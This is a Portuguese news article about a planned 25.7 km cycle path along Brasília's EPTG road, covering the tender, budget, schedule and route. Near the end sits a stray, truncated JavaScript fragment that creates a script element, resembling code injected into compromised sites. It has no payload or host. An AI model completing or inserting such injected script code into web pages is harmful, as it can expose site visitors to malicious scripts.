Ciclovia da EPTG terá quase 26 quilômetros

EPTG liga Taguatinga ao Plano Piloto. Foto: Tony Winston/Agência Brasília

Está em curso a concorrência para execução da obra da ciclovia na Estrada Parque Taguatinga (EPTG). Serão 25,7 quilômetros de pista construída — a EPTG tem 11,2 quilômetros. A licitação do Departamento de Estradas de Rodagem do Distrito Federal (DER-DF) tem orçamento previsto de R$ 11.789.414,27.

 

Na quinta-feira (2), o DER começou a analisar a documentação das 12 empresas interessadas, de acordo com o prazo do aviso de licitação publicado no Diário Oficial do Distrito Federal em 27 de dezembro de 2016. Após o resultado de habilitação, a obra deve ser executada em 240 dias pela empresa vencedora da concorrência.

Serão três faixas de ciclovia, nas marginais e no canteiro central da via. Elas começam nas entradas dos Pistões Sul e Norte e terminam na altura da Octogonal e do trecho de entroncamento da Estrada Parque Indústria e Abastecimento (Epia), onde se conectam com calçadas. 

Conexão  com calçadas – A diretora de Estudos e Projetos do DER, Ery Brandi, explica que o projeto contempla terraplanagem, pavimentação, construção de calçadas e sinalização. “Em alguns pontos a ciclovia se conecta a calçadas já existentes, que passam a ser compartilhadas entre pedestre e ciclistas”, detalha.

Ela explica que as pistas não são contínuas e se fundem em pontos específicos. Em alguns trechos, haverá marcadores rodocicloviários, que são as faixas pontilhadas para travessia de bicicletas. Nos locais de alta velocidade, haverá semáforos acionados por botões para facilitar o acesso dos ciclistas.

A pista das bicicletas é constituída de rota própria, separada fisicamente do tráfego geral. A definição está na Lei nº 4.397, de 2009, que dispõe sobre a criação do Sistema Cicloviário do DF. A obra é uma demanda dos que trafegam na região.

De acordo com o DER, além de contemplar moradores de Taguatinga, a ideia é facilitar a mobilidade para ciclistas de Águas Claras, Vicente Pires, Lucio Costa, Guará e Setor de Indústria e Abastecimento (SIA).

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário